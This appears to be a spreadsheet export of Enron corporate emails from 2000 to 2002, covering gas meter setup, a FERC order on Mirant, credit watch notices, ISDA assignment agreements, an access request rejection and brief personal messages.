    <t xml:space="preserve">Per authorization fromDaren Farmer, I have changed pipe code PGEV to PGTT.  The meter no. will remain the same.  The Rate Zone is PGTT and the Trade Zone is TUFCO._x000D_
_x000D_
Should you have any further questions, please do not hesitate to contact me._x000D_
_x000D_
Marlene D. Hilliard_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	kdstewart@aep.com@ENRON [mailto:IMCEANOTES-kdstewart+40aep+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Friday, August 10, 2001 1:30 PM_x000D_
To:	Hilliard, Marlene_x000D_
Subject:	8743 Meter Set Up; Fac# 501869_x000D_
_x000D_
_x000D_
Look thru the sequence history.  The Meter # on the opposite side did not change _x000D_
even though the pipe code did.  That is all I have to suggest. _x000D_
To:        &lt;kdstewart@aep.com&gt;, "Farmer, Daren J." &lt;Daren.J.Farmer@enron.com&gt; _x000D_
cc:         _x000D_
Subject:        FW: FW: 8743 Meter Set Up; Fac# 501869 _x000D_
I need to get the approval from Daren Farmer ext. 3-6905.  Please feel_x000D_
free to contact him to discuss this matter._x000D_
Also, I do not believe the meter no. will be the same.  I searched PI_x000D_
Grid and it shows HPL with DRN 92686 interconnect with meter no._x000D_
237-07-1-004, DRN 26879 for Teco Pipeline Co._x000D_
We have discrepencies/isssues._x000D_
What verifying information do you have for this meter?_x000D_
Marlene D. Hilliard_x000D_
Ext. 3-9167_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:                  kdstewart@aep.com@ENRON_x000D_
&gt; [mailto:IMCEANOTES-kdstewart+40aep+2Ecom+40ENRON@ENRON.com] _x000D_
&gt; Sent:                 Friday, August 10, 2001 1:16 PM_x000D_
&gt; To:                 Hilliard, Marlene_x000D_
&gt; Subject:                 Re: FW: 8743 Meter Set Up; Fac# 501869_x000D_
&gt; _x000D_
&gt; _x000D_
&gt; I have already created a new sequence starting 7/01/2001, can you_x000D_
&gt; change the pipe _x000D_
&gt; code and other relavant info in the new sequence starting 7/01/2001.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Thu, 10 May 2001 02:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joe.gordon@enron.com', 'linda.robertson@enron.com', 'george.wood@enron.com', 'charles.decker@enron.com', 'mark.bernstein@enron.com', 'mason.hamlin@enron.com', 'gautam.gupta@enron.com', 'edward.baughman@enron.com', 'donna.fulton@enron.com', 'tom.hoatson@enron.com', 'sarah.novosel@enron.com', 'pearce.hammond@enron.com', 'garrett.tripp@enron.com', 'jeff.ader@enron.com', 'john.llodra@enron.com', 'steve.montovano@enron.com', 'janelle.scheuer@enron.com', 'rob.wheeler@enron.com', 'richard.shapiro@enron.com', 'thane.twiggs@enron.com', 'aleck.dadson@enron.com', 'berney.aucoin@enron.com', 'narsimha.misra@enron.com', 'jason.thompkins@enron.com', 'steven.kean@enron.com', 'kathleen.sullivan@enron.com', 'tom.may@enron.com', 'mbrown9@enron.com', 'howard.fromer@enron.com', 'paul.broderick@enron.com', 'mark.davis@enron.com', 'daniel.allegretti@enron.com', 'jim.meyn@enron.com', 'james.steffes@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'joe.hartsoe@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Mirant Order</t>
  </si>
  <si>
    <t>Yesterday evening, FERC issued an order granting Mirant's complaint against _x000D_
the ISO's plans to implement the Circuit Breaker proposal without FERC _x000D_
approval.  The Commission said that the ISO must file proposed tariff sheets _x000D_
if it wants to implement the Circuit Breaker proposal.  _x000D_
_x000D_
----- Forwarded by Sarah Novosel/Corp/Enron on 05/10/2001 10:16 AM -----_x000D_
_x000D_
	"Jackie Gallagher" &lt;JGallagher@epsa.org&gt;_x000D_
	05/10/2001 09:52 AM_x000D_
		 _x000D_
		 To: &lt;acomnes@enron.com&gt;, &lt;bhawkin@enron.com&gt;, &lt;carin.nersesian@enron.com&gt;, _x000D_
&lt;christi.l.nicolay@enron.com&gt;, &lt;donna.fulton@enron.com&gt;, _x000D_
&lt;janelle.scheuer@enron.com&gt;, &lt;jhartso@enron.com&gt;, &lt;john.shelk@enron.com&gt;, _x000D_
&lt;jsteffe@enron.com&gt;, &lt;Linda.J.Noske@enron.com&gt;, &lt;ray.alvarez@enron.com&gt;, _x000D_
&lt;rshapiro@enron.com&gt;, &lt;Sarah.Novosel@enron.com&gt;, &lt;sscott3@enron.com&gt;, _x000D_
&lt;tom.hoatson@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Mirant Order_x000D_
_x000D_
_x000D_
In an Order issued May 9th, the Commission granted Mirant's complaint against _x000D_
plans of the NYISO to automate a step in its market mitigation measures to _x000D_
eliminate the current one-day delay in mitigating conduct that would _x000D_
otherwise set non-competitive market energy prices in the next day's _x000D_
Day-Ahead Market (DAM).  The NYISO must file proposed tariff sheets under _x000D_
Section 205 if it wishes to implement its modified market mitigation _x000D_
procedures._x000D_
The Order is attached in "TIFF" format.  If you are unable open it, the Order _x000D_
should be posted on FERC's website later today._x000D_
_x000D_
 - eff9BD.tif</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 09:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: hi</t>
  </si>
  <si>
    <t>Man, there must be a lot of bad hair out your way with that kind of heat.</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 01:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">thanks.  the letter is already out, but we will be accurate in follow up _x000D_
calls and in press interviews._x000D_
_x000D_
_x000D_
_x000D_
	Tim Belden@ECT_x000D_
	10/31/2000 08:33 AM_x000D_
		_x000D_
		 To: Steven J Kean/NA/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: Hoecker letter_x000D_
_x000D_
I just noticed one minor error.  I think that you are trying to highlight _x000D_
that Terry Winter, the Chief Executive Officer of the ISO voted against the _x000D_
proposal.  In the text, you say the Chairman of the ISO.  There is no _x000D_
Chairman of the ISO.  There is a Chairman of the Board of the ISO -- Jan _x000D_
Smutney-Jones -- who has consistently voted against the price caps since _x000D_
June.  Sorry for the delay in getting back to you._x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 09:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lauri.allen@enron.com', 'edward.gottlob@enron.com', 'michael.bilberry@enron.com', 'pat.clynes@enron.com'})</t>
  </si>
  <si>
    <t>Gulf Plains</t>
  </si>
  <si>
    <t>Imbalance update:  I spoke with Mike Bilberry and confirmed that this deal _x000D_
really is Energy In/Energy Out.  We should not be impacted in any way by a _x000D_
reallocation to correct PVR percentages or a C5 correction at the plant.   _x000D_
HPL/ENA should rereceive the same volume, Dth for Dth at the residue or at a _x000D_
redelivery point such as Lobo/Agua.  I have left a message for my counterpart _x000D_
at Duke and am requesting that they deliver to us, somewhere, an additional _x000D_
20,125 Dth/Day for the month of December to balance us out._x000D_
_x000D_
Please let me know if you have any questions or comments.  I will advise _x000D_
everyone upon their agreement to payback so that our respective positions _x000D_
reflect the additional supply._x000D_
_x000D_
Mary</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 00:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kristina.mordaunt@enron.com'})</t>
  </si>
  <si>
    <t>CEO</t>
  </si>
  <si>
    <t>Jeff-_x000D_
 _x000D_
Heard the great news.  CONGRATS!!!!!!!!!!!!!!!_x000D_
_x000D_
Kristina</t>
  </si>
  <si>
    <t>Wed, 20 Feb 2002 13:51:56 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Request Submitted: Access Request 000000000083213</t>
  </si>
  <si>
    <t xml:space="preserve">	You were not given access to AEP._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	ARSystem &lt;ARSystem@mailman.enron.com&gt;@ENRON  _x000D_
Sent:	Wednesday, February 20, 2002 3:33 PM_x000D_
To:	Quezada, Daniel_x000D_
Subject:	Request Submitted: Access Request 000000000083213_x000D_
_x000D_
This resource request has been rejected. You can view the details of the  request by clicking http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000083213&amp;Page=MyReq._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000083213_x000D_
Approver Type       : Data_x000D_
Signature           : tommy.j.yanowski@enron.com_x000D_
Comments            : Chris should have access to Enron Estate portfolios only.  He should not need access to any AEP portfolios._x000D_
Request Create Date : 2/20/02 3:28:38 PM_x000D_
Requested For       : chris.germany@enron.com_x000D_
Resource Name       : Sitara Houston Production AEP Edit Trader_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 May 2001 03:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.forbis@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'richard.zdunkewicz@enron.com'})</t>
  </si>
  <si>
    <t>Re: Risk Profile and Liability Mitigation Product</t>
  </si>
  <si>
    <t xml:space="preserve">Cheryl - _x000D_
_x000D_
Please include me in follow up meeting._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Richard L Zdunkewicz                           05/03/2001 09:56 AM_x000D_
	_x000D_
_x000D_
To: James L Bouillion/Enron@EnronXGate, Paul Clayton/Enron@EnronXGate, Vince _x000D_
J Kaminski/HOU/ECT@ECT_x000D_
cc: James Harris/HOU/EES@EES, Jeff Forbis/HOU/EES@EES, Richard B _x000D_
Jones/HOU/EES@EES, Cheryl Brashier/HOU/EES@EES _x000D_
Subject: Risk Profile and Liability Mitigation Product_x000D_
_x000D_
Please find attached a Scope of Services document and a list of projects _x000D_
which have been implemented with current EES customers.  The Scope of _x000D_
Services document is designed to show the types of projects, operations and _x000D_
maintenance, and facilities management services that EESO typically offers to _x000D_
its customers based on their industry segment.  The projects and services _x000D_
offered are very similar across segments and customers, but their level of _x000D_
deployment varies significantly from segment to segment.  _x000D_
_x000D_
Certain segments were grouped together because the EESO offering would _x000D_
feature similar assets and services._x000D_
SIC Codes were given for each segment to represent the types of customers _x000D_
that comprise each segment. _x000D_
The list of projects represents general categories from which more specific _x000D_
projects will be tailored to fit the clients needs.  This project list _x000D_
represents assets that have been approved by the DSM Desk and was queried _x000D_
from PCCS._x000D_
The Operations and Maintenance services can be applied to any energy-related _x000D_
assets and was compiled from term sheets and IAM.  Generally those activities _x000D_
have been limited to a few industrial outsourcing deals including Springs, _x000D_
Polaroid and recently Eli Lilly._x000D_
Facilities Management is usually outsourced via IPT or through the adoption _x000D_
of existing vendor contracts and can involve repair and maintenance for all _x000D_
assets.   Generally this type of activity has been focused on the retail/real _x000D_
estate segment._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Cheryl, pls set up a meeting with Harris, Clayton, Bouillion, Jones and _x000D_
Kaminski to discuss this and an action plan to develop a liability mitigation _x000D_
product.  I will re-present the original product concept at the meeting.  _x000D_
Would like to see the meeting take place late next week._x000D_
_x000D_
Thanks._x000D_
_x000D_
Richard_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Feb 2000 03:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dwill25@bellsouth.net'})</t>
  </si>
  <si>
    <t>Re: LSU visit (Resume)</t>
  </si>
  <si>
    <t xml:space="preserve">Datren,_x000D_
_x000D_
I am forwarding your resume to our Analyst/Associate program._x000D_
I talked to them about my needs for the summer and I don't see any problem._x000D_
They should contact you shortly._x000D_
_x000D_
Vince Kaminski_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Datren Williams &lt;dwill25@bellsouth.net&gt; on 02/05/2000 03:46:43 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: LSU visit (Resume)_x000D_
_x000D_
_x000D_
_x000D_
Mr. Kaminski,_x000D_
_x000D_
It was a pleasure and honor to have lunch with you. I also enjoyed your_x000D_
presentation in our graduate class.  I hope you enjoyed your visit to_x000D_
Baton Rouge. Come back to visit us sometime!!_x000D_
_x000D_
Attached is my resume as you suggested.  Thank you for your interest in_x000D_
LSU and me._x000D_
_x000D_
Sincerely,_x000D_
Datren L. Williams_x000D_
_x000D_
 - RESUME.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 12:59:43 -0800 (PST)</t>
  </si>
  <si>
    <t>how bout 3:15?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Allen, Margaret  _x000D_
Sent:	Wednesday, November 14, 2001 2:55 PM_x000D_
To:	Arnold, John_x000D_
Subject:	RE: _x000D_
_x000D_
When are we going? _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Arnold, John  _x000D_
Sent:	Wednesday, November 14, 2001 10:56 AM_x000D_
To:	Allen, Margaret_x000D_
Subject:	_x000D_
_x000D_
wanna get a smoothie with me by the playground with me after school?</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 02:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: RC Reports - Salary Allocations to Work Orders</t>
  </si>
  <si>
    <t xml:space="preserve">I don't think I have this information.  Do you?  Lets talk.  Thanks. DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Eric Benson_x000D_
02/08/2000 03:42 PM_x000D_
To: Drew Fossum/ET&amp;S/Enron@Enron, Dorothy McCoppin/FGT/Enron@Enron, Louis _x000D_
Soldano/ET&amp;S/Enron@Enron_x000D_
cc: Michael Moran/GPGFIN/Enron@Enron _x000D_
_x000D_
Subject: RC Reports - Salary Allocations to Work Orders_x000D_
_x000D_
To: Distribution_x000D_
From: Eric Benson_x000D_
_x000D_
In doing some research for Dorothy regarding salaries charged to work orders, _x000D_
I was advised by Judy Lin and James Weitekamp with accounting, that we need _x000D_
to provide Judy Lin with a payroll fixed percentage distribution by _x000D_
employee.  For example:_x000D_
_x000D_
RC - 0237 Eric Benson .10 Navajo Work Order (work order number)_x000D_
    .90 salary charged to RC_x000D_
_x000D_
The report to Judy should be for each employee within your respective RC's.  _x000D_
I have the allocation or percentages for Lou's RC but do not have the _x000D_
percentages for Drew and Dorothy.  If you like, please provide this _x000D_
information to me and I will be happy to send the request on to Judy Lin in _x000D_
accounting who will make all necessary corrections for January and February _x000D_
payroll._x000D_
_x000D_
Eric_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 01:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brett.pate@enron.com'})</t>
  </si>
  <si>
    <t>Re: Fwd Obligation Testing</t>
  </si>
  <si>
    <t xml:space="preserve">Brett -_x000D_
_x000D_
I'm so sorry for not sending you an e-mail last night! I did test the report _x000D_
and it looks just fine - but I had so many things going on right up until I _x000D_
left that I forgot to tell YOU that it looked fine. Thanks for the reminder, _x000D_
and for your work on the report._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
From: Brett Pate/ENRON@enronXgate on 03/29/2001 09:10 AM CST_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Fwd Obligation Testing_x000D_
_x000D_
Kate, were you able to test the Fwd Obligation Report?  Mr. Luu is ready to _x000D_
push it in to production, but we wanted you to look at it and give it your ok _x000D_
first.  _x000D_
_x000D_
Thanks, _x000D_
_x000D_
Brett Pate_x000D_
Enpower QA_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 14:03:25 -0800 (PST)</t>
  </si>
  <si>
    <t>RE:  Assignment Agreement - National Westminster Bank  plc</t>
  </si>
  <si>
    <t>I WILL MAKE THE CORRECTION._x000D_
_x000D_
Samantha M. Boyd_x000D_
Senior Legal Specialist_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3803_x000D_
Houston, Texas 77002_x000D_
Ph:  (713) 853-9188_x000D_
Fax:  (713) 646-3490_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Rohauer, Tanya =20_x000D_
Sent:=09Wednesday, October 31, 2001 3:41 PM_x000D_
To:=09Boyd, Samantha_x000D_
Cc:=09Jones, Tana; Taylor, Mark E (Legal)_x000D_
Subject:=09RE:  Assignment Agreement - National Westminster Bank  plc_x000D_
_x000D_
Not quite... the transactions are assigned to RBS, but the document reads t=_x000D_
hat RBS and ENA are deemed to have entered into an ISDA that replicates the=_x000D_
 1994 NWB/ENA ISDA.  Thus no transactions are governed by the 1999 RBS ISDA=_x000D_
 and it should be terminated._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Boyd, Samantha =20_x000D_
Sent:=09Wednesday, October 31, 2001 3:34 PM_x000D_
To:=09Adams, Laurel; Allen, Kimberly; Anderson, Diane; Bailey, Derek; Bell,=_x000D_
 Jean; Bell, Rebecca; Bowen, Bob; Brewer, Julie; Cason, Sharen; Cisneros, C=_x000D_
eleste; Fischer, Jason; Garcia, Jorge A. ; Heaney, Gordon; Hundl, Kimberly;=_x000D_
 Murphy, Melissa Ann; Ornelas, Bianca; Piwetz, Stephanie; Rodriguez, Meliss=_x000D_
a; Seib, Dianne; Theriot, Kim S.; Whalen, Melinda; Williams, Tiffany; Brack=_x000D_
ett, Debbie R.; Bradford, William S.; Brown, Angela Y.; Campbell, Lesli; Co=_x000D_
nwell, Wendy; Curry, Ken; Espinoza, Veronica; Gonzalez, Veronica; Johnson, =_x000D_
Rudwell; Landry, Shemeika S.; Lebrocq, Wendi; Mendoza, Nidia; Monterrey, Ma=_x000D_
ribel; Moran, Tom; Ngo, Tracy; North, Carol; Otto, Randy; Radous, Paul; Raj=_x000D_
aram, Aparna; Rohauer, Tanya; Sacks, Edward; Sonnonstine, Max; Vanek, Darre=_x000D_
n; Williams, Jason R (Credit); Campos, Anthony; Colbert, Marilyn; Crawford,=_x000D_
 Sharon; Ebow, Amber; Ellstrom, Diane; Gerard, Camille; Hare, Bill D.; John=_x000D_
son, Cheryl; Lambert, Karen; Landau, Georgi; Lees, Lisa; Moore, Jason; Neun=_x000D_
er, Dale; Reeves, Leslie; Richardson, Stacey; Rodriguez, Bernice; Schott, S=_x000D_
amuel; Sever, Stephanie; Shivers, Lynn; Sietzema, Linda; Southard, Carrie; =_x000D_
Bailey, Susan; Cook, Mary; Gray, Barbara N.; Heard, Marie; Hendry, Brent; J=_x000D_
ones, Tana; Koehler, Anne C.; Leite, Francisco Pinto; Nelson, Cheryl; Panus=_x000D_
, Stephanie; Sayre, Frank; Shackleton, Sara; St. Clair, Carol; Taylor, Mark=_x000D_
 E (Legal)_x000D_
Subject:=09 Assignment Agreement - National Westminster Bank  plc_x000D_
_x000D_
We have received an executed Assignment Agreement dated as of October 9, 20=_x000D_
01 among National Westminster Bank plc ("NWB"), The Royal Bank of Scotland =_x000D_
plc ("RBS") and Enron North America Corp. ("ENA").   Effective as of Octobe=_x000D_
r 26, 2001 (the "Commencement Date"), NWB assigned all of its right, title =_x000D_
and interest in the transactions under the ISDA Master Agreement dated Janu=_x000D_
ary 1, 1994 to RBS.  All assigned transactions shall be governed by the ter=_x000D_
ms and conditions under the ISDA Master Agreement between ENA and RBS dated=_x000D_
 December 10, 1999._x000D_
_x000D_
This Assignment Agreement also amends the notice provisions in the Schedule=_x000D_
 to the ISDA Master Agreement between ENA and RBS.=20_x000D_
_x000D_
_x000D_
Copies will be distributed._x000D_
_x000D_
Samantha M. Boyd_x000D_
Senior Legal Specialist_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3803_x000D_
Houston, Texas 77002_x000D_
Ph:  (713) 853-9188_x000D_
Fax:  (713) 646-3490</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 14:11:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jean.mcfarland@enron.com'})</t>
  </si>
  <si>
    <t>Hey!!</t>
  </si>
  <si>
    <t>How do you like the Blackberry?_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 03:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jason.peters@enron.com', 'mark.taylor@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>Securities Act Reps</t>
  </si>
  <si>
    <t>Mark, Jason and Sara:_x000D_
_x000D_
Deutsche Bank has requested that we make various "Securities Act" reps in the _x000D_
ISDA Schedule in the event that we do equity derivatives.  These reps require _x000D_
us and them to say:_x000D_
_x000D_
1. To the extent that a Transaction involves the purchase and sale of _x000D_
securities, it will not be registered and the securities cannot be sold _x000D_
except pursuant to a reg statement or exemption._x000D_
_x000D_
2. Each party is a QIB or an accredited investor._x000D_
_x000D_
3. Unless otherwise set forth in a Confirmation, any securities that a party _x000D_
is required to deliver shall not at the time of delivery constitute _x000D_
restricted securities or be subject to restrictions on transfer._x000D_
_x000D_
What do you think about this?_x000D_
_x000D_
Carol</t>
  </si>
  <si>
    <t>Sat, 8 Apr 2000 03:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>NBPL Rate Case</t>
  </si>
  <si>
    <t xml:space="preserve">This explains a lot.  Lets talk at 9 on what the status of the case is--find _x000D_
some trade press articles first thing mon. AM and don't bug Janet quite yet.  _x000D_
Sounds like Bill has arranged a briefing by the NB people for our benefit  _x000D_
(and probably an argument about whether we should intervene).  Thanks.  DF _x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 04/08/2000 _x000D_
10:26 AM ---------------------------_x000D_
Meeting Confirmation_x000D_
From: Virginia O'Neill on 04/07/2000 10:29 AM_x000D_
To: Dave Neubauer/ET&amp;S/Enron@ENRON, Drew Fossum/ET&amp;S/Enron@ENRON, Mary Kay _x000D_
Miller/ET&amp;S/Enron@Enron_x000D_
cc: Deb Cappiello/ET&amp;S/Enron@ENRON, Martha Benner/ET&amp;S/Enron@ENRON, Sharon _x000D_
Solon/ET&amp;S/Enron@ENRON _x000D_
Subject: NBPL Rate Case_x000D_
_x000D_
Larry DeRoin now indicates that they are available to meet next Monday _x000D_
morning, April 10, to discuss the NBPL Rate case.  The meeting will take _x000D_
place following Stan's Monday morning meeting which generally concludes at _x000D_
10:00 AM.  Mary Kay, Bill is aware that you will be out on Monday -- someone _x000D_
will up-date you following the meeting.  _x000D_
_x000D_
The following meeting has been confirmed:_x000D_
_x000D_
 Topic:   NBPL Rate Case  _x000D_
 Date:   Monday, April 10_x000D_
 Time:   10:00 AM_x000D_
 Meeting Location: Cordes' Conference Room_x000D_
_x000D_
Additional information:  _x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 03:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.smith@enron.com', 'paul.choi@enron.com', 'steve.schneider@enron.com', 'kate.fraser@enron.com', 'souad.mahmassani@enron.com', 'james.barker@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'sylvia.pollan@enron.com', 'brad.coleman@enron.com', 'brad.mckay@enron.com', 'richard.deming@enron.com', 'dan.mccairns@enron.com', 'jack.simunek@enron.com', 'kristen.hanson@enron.com', 'ron.green@enron.com', 'larry.hunter@enron.com', 'joanne.harris@enron.com', 'melissa.graves@enron.com', 'brad.horn@enron.com', 'shonnie.daniel@enron.com', 'tom.moran@enron.com', 'bryce.baxter@enron.com', 'mark.taylor@enron.com', 'matthew.fleming@enron.com', 'angelo.miroballi@enron.com', 'charles.otto@enron.com', 'colleen.sullivan@enron.com', 'greg.brazaitis@enron.com', 'jay.knoblauh@enron.com', 'isabel.resendez@enron.com', 'andrew.conner@enron.com', 'kyle.schultz@enron.com', 'gerald.nemec@enron.com', 'vance.taylor@enron.com', 'ina.rangel@enron.com', 'sara.shackleton@enron.com', 'susan.pereira@enron.com', 'andrew.greer@enron.com', 'debbie.brackett@enron.com', 'christina.bangle@enron.com', 'jane.tholt@enron.com', 'recipients@enron.com', 'mary.smith@enron.com', 'steven.south@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'amanda.boettcher@enron.com', 'lester.rawson@enron.com', 'mary.cook@enron.com', 'nicole.cortez@enron.com', 'marde.driscoll@enron.com', 'lucy.ortiz@enron.com', 'christy.sweeney@enron.com', 'sandi.braband@enron.com', 'ellen.wallumrod@enron.com', 'andrew.lewis@enron.com', 'sally.beck@enron.com', 'william.bradford@enron.com', 'zarin.imam@enron.com', 'daniel.salinas@enron.com', 'edward.baughman@enron.com', 'geoff.storey@enron.com', 'gerald.lofton@enron.com', 'lauri.allen@enron.com', 'kim.theriot@enron.com', 'teresa.seibel@enron.com', 'russell.diamond@enron.com', 'michael.etringer@enron.com', 'andrea.ring@enron.com', 'jefferson.sorenson@enron.com', 'cheryl.marshall@enron.com', 'barbara.gray@enron.com', 'berney.aucoin@enron.com', 'craig.breslau@enron.com', 'gary.bryan@enron.com', 'lisa.valderrama@enron.com', 'david.fairley@enron.com', 'jeffrey.shankman@enron.com', 'gary.lamphier@enron.com', 'mike.grigsby@enron.com', 'barend.vanderhorst@enron.com', 'phillip.allen@enron.com', 'gregory.schockling@enron.com', 'john.taylor@enron.com', 'robert.shiring@enron.com', 'shawna.flynn@enron.com', 'william.stuart@enron.com', 'chris.foster@enron.com', 'veronica.espinoza@enron.com', 'david.parquet@enron.com', 'george.smith@enron.com', 'jennifer.fraser@enron.com', 'sandra.brawner@enron.com', 'steve.hooser@enron.com', 'lisa.gillette@enron.com', 'peter.keavey@enron.com', 'tammi.depaolis@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com', 'derek.bailey@enron.com', 'joanie.ngo@enron.com', 'jake.thomas@enron.com', 'david.eubanks@enron.com', 'patrick.hanse@enron.com', 'dick.jenkins@enron.com', 'lance.halgren@enron.com', 'sarah.mulholland@enron.com', 'christian.yoder@enron.com', 'melissa.murphy@enron.com', 'katherine.herrera@enron.com', 'keith.holst@enron.com', 'george.gilbert@enron.com', 'kenneth.kaase@enron.com', 'peggy.banczak@enron.com', 'paul.tate@enron.com', 'bernard.dahanayake@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melissa.ratnala@enron.com', 'alain.diza@enron.com', 'daniel.reck@enron.com', 'lisa.mellencamp@enron.com', "martin.o'leary@enron.com", 'bo.petersen@enron.com', 'josephine.logan@enron.com', 'vladimir.gorny@enron.com', 'janie.aguayo@enron.com', 'mike.miller@enron.com', 'greg.mcclendon@enron.com', 'sheila.glover@enron.com', 'stuart.staley@enron.com', 'sunil.dalal@enron.com', 'gregg.penman@enron.com', 'kyle.lilly@enron.com', 'lisa.lees@enron.com', 'rhonda.smith@enron.com', 'andrea.hauser@enron.com', 'stephanie.sever@enron.com', 'cindy.vachuska@enron.com', 'ann.white@enron.com', 'jay.blaine@enron.com', 'jason.williams@enron.com', 'suzy.robey@enron.com', 'kimberly.olinger@enron.com', 'dennis.benevides@enron.com', 'elizabeth.sager@enron.com', 'fred.lagrasta@enron.com', 'winston.cheng@enron.com', 'tim.weithman@enron.com', 'tom.donohoe@enron.com', 'george.hope@enron.com', 'paul.lucci@enron.com', 'jung-suk.suh@enron.com', 'candace.bywaters@enron.com', 'jesus.guerra@enron.com', 'kelly.lovvorn@enron.com', 'tana.jones@enron.com', 'ragan.bond@enron.com', 'john.lavorato@enron.com', 'hunter.shively@enron.com', 'carol.clair@enron.com', 'maureen.smith@enron.com', 'jess.hewitt@enron.com', 'leslie.reeves@enron.com', 'jennifer.blay@enron.com', 'audrey.cook@enron.com', 'greg.wolfe@enron.com', 'edward.gottlob@enron.com', 'bob.bowen@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Credit Watch List--4/23/01</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a revised Credit Watch listing as of 4/23/01.   Please note that _x000D_
NUI Utilities, Inc. has been placed on "No Trades".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t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 03:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'denise.moore@dhs.state.tx.us'})</t>
  </si>
  <si>
    <t>frozenset({'prisc.jenkinsroberts@dhs.state.tx.us', 'ddavis@enron.com', 'trenawhite@gillcook.com', 'witness4him@juno.com', 'limbrlm@texaco.com', 'tammerriol.smith@dhs.state.tx.us', 'emoore@velsicol.com', 'cmontgomery@kmg.com', 'cashley@poha.com', 'levester.ross@dhs.state.tx.us', 'bettynance@dellnet.com', 'dark_lovely1913@hotmail.com', 'joycemmoor@aol.com'})</t>
  </si>
  <si>
    <t>FW: A Word</t>
  </si>
  <si>
    <t>-----Original Message-----_x000D_
From: edith-kelly@reliantenergy.com_x000D_
[mailto:edith-kelly@reliantenergy.com]_x000D_
Sent: Monday, November 20, 2000 11:02 AM_x000D_
To: jwashing@mail.mdanderson.org; Grace Jackson;_x000D_
jacqueline_j_garza@reliantenergy.com; Bonnie &amp; Rayford Abraham; Lisa_x000D_
Croft; Derrick Lankford; karla Mayfield; Moore,Denise I;_x000D_
Pvam2000@aol.com; gloria-stryker@reliantenergy.com;_x000D_
maggie-hogan@reliantenergy.com; carol-olson@reliantenergy.com;_x000D_
veronica_z_smith@reliantenergy.com_x000D_
Subject: A Word_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: ~ME00001.PPS)_x000D_
_x000D_
_x000D_
_x000D_
 - ~ME00001.PPS</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 13:44:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'l..day@enron.com'})</t>
  </si>
  <si>
    <t>RE: QSE project timeline</t>
  </si>
  <si>
    <t>Dave:_x000D_
_x000D_
